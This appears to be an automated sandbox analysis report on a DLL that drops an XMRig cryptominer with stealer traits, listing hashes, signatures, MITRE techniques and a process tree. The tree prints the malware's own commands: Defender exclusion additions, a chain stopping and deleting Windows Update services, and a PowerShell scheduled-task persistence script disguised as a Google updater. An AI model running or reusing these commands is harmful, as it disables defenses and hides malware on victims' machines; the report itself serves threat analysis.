xmrig | 1d58e9f81b10e3da48c2525020f25e6109f14026e1234041bf7131c5b8c0c8bd

Analysis

max time kernel
151s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
25-10-2022 09:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a54d4986e42a30f271bf1e70e9153b44.dll
Size

2.7MB
MD5

a54d4986e42a30f271bf1e70e9153b44
SHA1

a7f8b572c7afd435690200115adf3b047486d3a6
SHA256

1d58e9f81b10e3da48c2525020f25e6109f14026e1234041bf7131c5b8c0c8bd
SHA512

f5895ca7f359b18d9cee671dfc904cc1417d01b2abf0e67195397dabb0d463ed64b9a64edb299f000a54aad3e0139879859363bc3086a62101d09a7b58f51532
SSDEEP

49152:Jzl1rpbUrqvv0v2rQVt8nqwI7lOOYch2ek:P1Kqvv07noI7lOOYcz

Score

10^/10

xmrig evasion miner spyware stealer upx

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral2/memory/1036-189-0x00007FF750040000-0x00007FF750834000-memory.dmp	xmrig
behavioral2/memory/1036-191-0x00007FF750040000-0x00007FF750834000-memory.dmp	xmrig

Blocklisted process makes network request 4 IoCs

flow	pid	Process
1	4496	rundll32.exe
3	4496	rundll32.exe
10	4496	rundll32.exe
21	4496	rundll32.exe

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	ysniwclygugcrlzbcw.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

Executes dropped EXE 2 IoCs

pid	Process
3832	ysniwclygugcrlzbcw.exe
4604	updater.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1036-189-0x00007FF750040000-0x00007FF750834000-memory.dmp	upx
behavioral2/memory/1036-191-0x00007FF750040000-0x00007FF750834000-memory.dmp	upx

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4604 set thread context of 1872	4604	updater.exe	131
PID 4604 set thread context of 1036	4604	updater.exe	132

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1704	sc.exe
3916	sc.exe
4292	sc.exe
4140	sc.exe
1444	sc.exe
2568	sc.exe
2404	sc.exe
2408	sc.exe
5088	sc.exe
4432	sc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4496	rundll32.exe
4496	rundll32.exe
1800	powershell.exe
1800	powershell.exe
5060	powershell.exe
5060	powershell.exe
3324	powershell.exe
3324	powershell.exe
1352	powershell.exe
1352	powershell.exe
2996	powershell.exe
2996	powershell.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe
1036	dwm.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
632	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeDebugPrivilege	5060	powershell.exe
Token: SeIncreaseQuotaPrivilege	5060	powershell.exe
Token: SeSecurityPrivilege	5060	powershell.exe
Token: SeTakeOwnershipPrivilege	5060	powershell.exe
Token: SeLoadDriverPrivilege	5060	powershell.exe
Token: SeSystemProfilePrivilege	5060	powershell.exe
Token: SeSystemtimePrivilege	5060	powershell.exe
Token: SeProfSingleProcessPrivilege	5060	powershell.exe
Token: SeIncBasePriorityPrivilege	5060	powershell.exe
Token: SeCreatePagefilePrivilege	5060	powershell.exe
Token: SeBackupPrivilege	5060	powershell.exe
Token: SeRestorePrivilege	5060	powershell.exe
Token: SeShutdownPrivilege	5060	powershell.exe
Token: SeDebugPrivilege	5060	powershell.exe
Token: SeSystemEnvironmentPrivilege	5060	powershell.exe
Token: SeRemoteShutdownPrivilege	5060	powershell.exe
Token: SeUndockPrivilege	5060	powershell.exe
Token: SeManageVolumePrivilege	5060	powershell.exe
Token: 33	5060	powershell.exe
Token: 34	5060	powershell.exe
Token: 35	5060	powershell.exe
Token: 36	5060	powershell.exe
Token: SeIncreaseQuotaPrivilege	5060	powershell.exe
Token: SeSecurityPrivilege	5060	powershell.exe
Token: SeTakeOwnershipPrivilege	5060	powershell.exe
Token: SeLoadDriverPrivilege	5060	powershell.exe
Token: SeSystemProfilePrivilege	5060	powershell.exe
Token: SeSystemtimePrivilege	5060	powershell.exe
Token: SeProfSingleProcessPrivilege	5060	powershell.exe
Token: SeIncBasePriorityPrivilege	5060	powershell.exe
Token: SeCreatePagefilePrivilege	5060	powershell.exe
Token: SeBackupPrivilege	5060	powershell.exe
Token: SeRestorePrivilege	5060	powershell.exe
Token: SeShutdownPrivilege	5060	powershell.exe
Token: SeDebugPrivilege	5060	powershell.exe
Token: SeSystemEnvironmentPrivilege	5060	powershell.exe
Token: SeRemoteShutdownPrivilege	5060	powershell.exe
Token: SeUndockPrivilege	5060	powershell.exe
Token: SeManageVolumePrivilege	5060	powershell.exe
Token: 33	5060	powershell.exe
Token: 34	5060	powershell.exe
Token: 35	5060	powershell.exe
Token: 36	5060	powershell.exe
Token: SeIncreaseQuotaPrivilege	5060	powershell.exe
Token: SeSecurityPrivilege	5060	powershell.exe
Token: SeTakeOwnershipPrivilege	5060	powershell.exe
Token: SeLoadDriverPrivilege	5060	powershell.exe
Token: SeSystemProfilePrivilege	5060	powershell.exe
Token: SeSystemtimePrivilege	5060	powershell.exe
Token: SeProfSingleProcessPrivilege	5060	powershell.exe
Token: SeIncBasePriorityPrivilege	5060	powershell.exe
Token: SeCreatePagefilePrivilege	5060	powershell.exe
Token: SeBackupPrivilege	5060	powershell.exe
Token: SeRestorePrivilege	5060	powershell.exe
Token: SeShutdownPrivilege	5060	powershell.exe
Token: SeDebugPrivilege	5060	powershell.exe
Token: SeSystemEnvironmentPrivilege	5060	powershell.exe
Token: SeRemoteShutdownPrivilege	5060	powershell.exe
Token: SeUndockPrivilege	5060	powershell.exe
Token: SeManageVolumePrivilege	5060	powershell.exe
Token: 33	5060	powershell.exe
Token: 34	5060	powershell.exe
Token: 35	5060	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1268 wrote to memory of 4496	1268	rundll32.exe	82
PID 1268 wrote to memory of 4496	1268	rundll32.exe	82
PID 1268 wrote to memory of 4496	1268	rundll32.exe	82
PID 4496 wrote to memory of 3832	4496	rundll32.exe	86
PID 4496 wrote to memory of 3832	4496	rundll32.exe	86
PID 3832 wrote to memory of 1800	3832	ysniwclygugcrlzbcw.exe	88
PID 3832 wrote to memory of 1800	3832	ysniwclygugcrlzbcw.exe	88
PID 3832 wrote to memory of 1416	3832	ysniwclygugcrlzbcw.exe	92
PID 3832 wrote to memory of 1416	3832	ysniwclygugcrlzbcw.exe	92
PID 3832 wrote to memory of 5060	3832	ysniwclygugcrlzbcw.exe	94
PID 3832 wrote to memory of 5060	3832	ysniwclygugcrlzbcw.exe	94
PID 1416 wrote to memory of 2404	1416	cmd.exe	95
PID 1416 wrote to memory of 2404	1416	cmd.exe	95
PID 1416 wrote to memory of 1704	1416	cmd.exe	97
PID 1416 wrote to memory of 1704	1416	cmd.exe	97
PID 1416 wrote to memory of 3916	1416	cmd.exe	98
PID 1416 wrote to memory of 3916	1416	cmd.exe	98
PID 1416 wrote to memory of 4292	1416	cmd.exe	99
PID 1416 wrote to memory of 4292	1416	cmd.exe	99
PID 1416 wrote to memory of 4432	1416	cmd.exe	100
PID 1416 wrote to memory of 4432	1416	cmd.exe	100
PID 1416 wrote to memory of 4700	1416	cmd.exe	101
PID 1416 wrote to memory of 4700	1416	cmd.exe	101
PID 1416 wrote to memory of 4500	1416	cmd.exe	102
PID 1416 wrote to memory of 4500	1416	cmd.exe	102
PID 1416 wrote to memory of 2372	1416	cmd.exe	103
PID 1416 wrote to memory of 2372	1416	cmd.exe	103
PID 1416 wrote to memory of 4720	1416	cmd.exe	104
PID 1416 wrote to memory of 4720	1416	cmd.exe	104
PID 1416 wrote to memory of 3912	1416	cmd.exe	105
PID 1416 wrote to memory of 3912	1416	cmd.exe	105
PID 3832 wrote to memory of 3324	3832	ysniwclygugcrlzbcw.exe	106
PID 3832 wrote to memory of 3324	3832	ysniwclygugcrlzbcw.exe	106
PID 3324 wrote to memory of 2088	3324	powershell.exe	108
PID 3324 wrote to memory of 2088	3324	powershell.exe	108
PID 4604 wrote to memory of 1352	4604	updater.exe	110
PID 4604 wrote to memory of 1352	4604	updater.exe	110
PID 4604 wrote to memory of 1744	4604	updater.exe	112
PID 4604 wrote to memory of 1744	4604	updater.exe	112
PID 4604 wrote to memory of 2996	4604	updater.exe	114
PID 4604 wrote to memory of 2996	4604	updater.exe	114
PID 1744 wrote to memory of 2408	1744	cmd.exe	116
PID 1744 wrote to memory of 2408	1744	cmd.exe	116
PID 1744 wrote to memory of 4140	1744	cmd.exe	117
PID 1744 wrote to memory of 4140	1744	cmd.exe	117
PID 1744 wrote to memory of 5088	1744	cmd.exe	118
PID 1744 wrote to memory of 5088	1744	cmd.exe	118
PID 1744 wrote to memory of 1444	1744	cmd.exe	119
PID 1744 wrote to memory of 1444	1744	cmd.exe	119
PID 1744 wrote to memory of 2568	1744	cmd.exe	120
PID 1744 wrote to memory of 2568	1744	cmd.exe	120
PID 1744 wrote to memory of 1380	1744	cmd.exe	121
PID 1744 wrote to memory of 1380	1744	cmd.exe	121
PID 1744 wrote to memory of 4368	1744	cmd.exe	122
PID 1744 wrote to memory of 4368	1744	cmd.exe	122
PID 1744 wrote to memory of 4320	1744	cmd.exe	123
PID 1744 wrote to memory of 4320	1744	cmd.exe	123
PID 1744 wrote to memory of 3252	1744	cmd.exe	124
PID 1744 wrote to memory of 3252	1744	cmd.exe	124
PID 1744 wrote to memory of 1276	1744	cmd.exe	125
PID 1744 wrote to memory of 1276	1744	cmd.exe	125
PID 4604 wrote to memory of 1872	4604	updater.exe	131
PID 4604 wrote to memory of 1872	4604	updater.exe	131
PID 4604 wrote to memory of 1872	4604	updater.exe	131

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\a54d4986e42a30f271bf1e70e9153b44.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:1268
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\a54d4986e42a30f271bf1e70e9153b44.dll,#1
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4496
- - C:\Users\Admin\AppData\Local\Temp\ysniwclygugcrlzbcw.exe
    "C:\Users\Admin\AppData\Local\Temp\ysniwclygugcrlzbcw.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3832
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1800
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1416
    - - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:2404
    - - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:1704
    - - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:3916
    - - C:\Windows\system32\sc.exe
        
        sc stop bits
        5⤵
        Launches sc.exe
        
        PID:4292
    - - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        5⤵
        Launches sc.exe
        
        PID:4432
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        5⤵
        
        PID:4700
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        5⤵
        
        PID:4500
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        5⤵
        Modifies security service
        
        PID:2372
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        5⤵
        
        PID:4720
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        
        PID:3912
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#gesvv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#btrwhe#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:3324
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
        5⤵
        
        PID:2088

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4604
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1352
- C:\Windows\system32\cmd.exe
  cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1744
- - C:\Windows\system32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2408
- - C:\Windows\system32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4140
- - C:\Windows\system32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:5088
- - C:\Windows\system32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1444
- - C:\Windows\system32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2568
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:1380
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:4368
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:4320
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:3252
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:1276
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell <#gesvv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2996
- C:\Windows\system32\cmd.exe
  cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
  2⤵
  PID:664
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name, VideoProcessor
    3⤵
    PID:5108
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe cuujhamlfzwomvc
  2⤵
  PID:1872
- C:\Windows\system32\dwm.exe
  C:\Windows\system32\dwm.exe hhpaajoofiimzvle 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUGu8K1XCwbSh+ypLRcuGVjKHCqkQEbMjFPp2wEHUk/2YPEa7u8eDtaLNsvMtmfnW7pfZpWBLC28ol0YuaRyoAomoKg0M+MybStmWANwpbdJc3A2uC6nbgxCBAPoLOO1OuubEuAZTBCdX/xrrcvKnB4H9LwgUyVl9z4LaBunuWLn9L+984DlEL8pLkHAhoqzbgnzq2Q8UulW3Pe1gu+jesqTUbmj//6+fiMhPgKixPwrGz+CELGutufbQREgiXW/NQvg1coXmscuZ6yQ7RnXXKH4GsnmWjjAo51w5WaTYtMM4tqi5n6yulrtZsexR2Y9abHIdInko1dNj2btVqFpVDPxbdEbNaQGAVINOHgf8WWal3b6c2wr6mRVWR/3OEXgmNHc0PdsvyYK2oX+Nd+NLu2cGMVpnPgCpRS4DeAKMErD9sVFST+vIdKC5haHZrq6Ao
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1036

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
1⤵
PID:4948

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
59d97011e091004eaffb9816aa0b9abd

SHA1
1602a56b01dd4b7c577ca27d3117e4bcc1aa657b

SHA256
18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d

SHA512
d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a736948fef59973faa0489367e66a8d3

SHA1
d1cd048051337ada46c10402d6bffedbd0e72f98

SHA256
eb2ee0d970eb681182540830a50ad83eac4b043ce725c42d643f7f4c98f931c9

SHA512
de3a518091bf6a86d5fc8cab2a1dc3e2d4290b35a2dcd79c58180d36ba396e18b50abd96b676be09a3cfee61d38de48b861bcbbec4093ba7a47506a81276e436

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0f6a3762a04bbb03336fb66a040afb97

SHA1
0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

SHA256
36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

SHA512
cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
692a440f9cfbeaf648632aead685a5a1

SHA1
e4e4bd8405be77294f4be5ea18b5e05b139f35af

SHA256
3e1615e7774bd98860c984570515c293b64cf07f1b8e6688a72e78fa9ebed0f4

SHA512
c7501a0fc978d0f06f32c4a205246763796a20c0b2514f00cb6676c8c95ab38d463b87c2973ca2b9b3e2fee3bc7ded869f5896c498303397167c4b5f069db519

Download Submit
C:\Users\Admin\AppData\Local\Temp\ysniwclygugcrlzbcw.exe

Filesize
4.0MB

MD5
254f52d736b363ba19a748d44d36bfbe

SHA1
ed37a872ed90f79691e63c3e770f0e30df0a667a

SHA256
1407005795e62e9cf1c25ac71cb547b2f59dcbb427823e1bc58c75fc05ff328a

SHA512
e4fa7e7ecfa499e4478dd4aa57ea661b26c255c1993445c85393f502c2eb02a5ebfd8af1918ff9a2bdc0a751c80a206274092da03843da06744f6c91ebd82413

Download Submit
C:\Users\Admin\AppData\Local\Temp\ysniwclygugcrlzbcw.exe

Filesize
4.0MB

MD5
254f52d736b363ba19a748d44d36bfbe

SHA1
ed37a872ed90f79691e63c3e770f0e30df0a667a

SHA256
1407005795e62e9cf1c25ac71cb547b2f59dcbb427823e1bc58c75fc05ff328a

SHA512
e4fa7e7ecfa499e4478dd4aa57ea661b26c255c1993445c85393f502c2eb02a5ebfd8af1918ff9a2bdc0a751c80a206274092da03843da06744f6c91ebd82413

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe

Filesize
4.0MB

MD5
67047d56feeb8d7b999e878aa443f42c

SHA1
1a0f57fea28a17171ccc63da2ef211f001b4cb67

SHA256
097ea3bed40d4251c6b1d68d0eb5703512698456f4e8dfbcb3930a3e37b7eaa4

SHA512
db29f658c168584a664882024a9222b087300d83f6346e0787afe87f332f6771a7e0f5201f788cef2f2c527fdf208b3b7f2fccaf2d783fdce94142be3ea1849d

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe

Filesize
4.0MB

MD5
67047d56feeb8d7b999e878aa443f42c

SHA1
1a0f57fea28a17171ccc63da2ef211f001b4cb67

SHA256
097ea3bed40d4251c6b1d68d0eb5703512698456f4e8dfbcb3930a3e37b7eaa4

SHA512
db29f658c168584a664882024a9222b087300d83f6346e0787afe87f332f6771a7e0f5201f788cef2f2c527fdf208b3b7f2fccaf2d783fdce94142be3ea1849d

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Libs\g.log

Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
0e4d11714a5401c53cf73b87ab167305

SHA1
73251bf00c6f8ef0cc9f128e3c823173f1bad850

SHA256
ff93b60eb90fcf9632b08354dfe9bc1bc32a6fc805ddefa61a560aff37186b11

SHA512
18480cf9738e3efccac90c6f39ae4f1fe8cb104ef124b8d4fc15b3b880a4cd0684ba7b2e6bb00c4a94a71e8e173d67b12f15ffbc19303c114172a7ba85b38d1b

Download Submit
memory/1036-188-0x000002615AD70000-0x000002615AD90000-memory.dmp

Filesize
128KB

Download
memory/1036-196-0x000002615AE40000-0x000002615AE60000-memory.dmp

Filesize
128KB

Download
memory/1036-193-0x000002615AE20000-0x000002615AE40000-memory.dmp

Filesize
128KB

Download
memory/1036-192-0x000002615AE20000-0x000002615AE40000-memory.dmp

Filesize
128KB

Download
memory/1036-191-0x00007FF750040000-0x00007FF750834000-memory.dmp

Filesize
8.0MB

Download
memory/1036-197-0x000002615AE20000-0x000002615AE40000-memory.dmp

Filesize
128KB

Download
memory/1036-190-0x000002615ADA0000-0x000002615ADE0000-memory.dmp

Filesize
256KB

Download
memory/1036-189-0x00007FF750040000-0x00007FF750834000-memory.dmp

Filesize
8.0MB

Download
memory/1036-194-0x000002615AE40000-0x000002615AE60000-memory.dmp

Filesize
128KB

Download
memory/1036-195-0x000002615AE20000-0x000002615AE40000-memory.dmp

Filesize
128KB

Download
memory/1352-163-0x00007FFBFE0F0000-0x00007FFBFEBB1000-memory.dmp

Filesize
10.8MB

Download
memory/1800-174-0x00007FFBFE0F0000-0x00007FFBFEBB1000-memory.dmp

Filesize
10.8MB

Download
memory/1800-137-0x00007FFBFE0F0000-0x00007FFBFEBB1000-memory.dmp

Filesize
10.8MB

Download
memory/1800-136-0x00000236F4560000-0x00000236F4582000-memory.dmp

Filesize
136KB

Download
memory/2996-180-0x00007FFBFE0F0000-0x00007FFBFEBB1000-memory.dmp

Filesize
10.8MB

Download
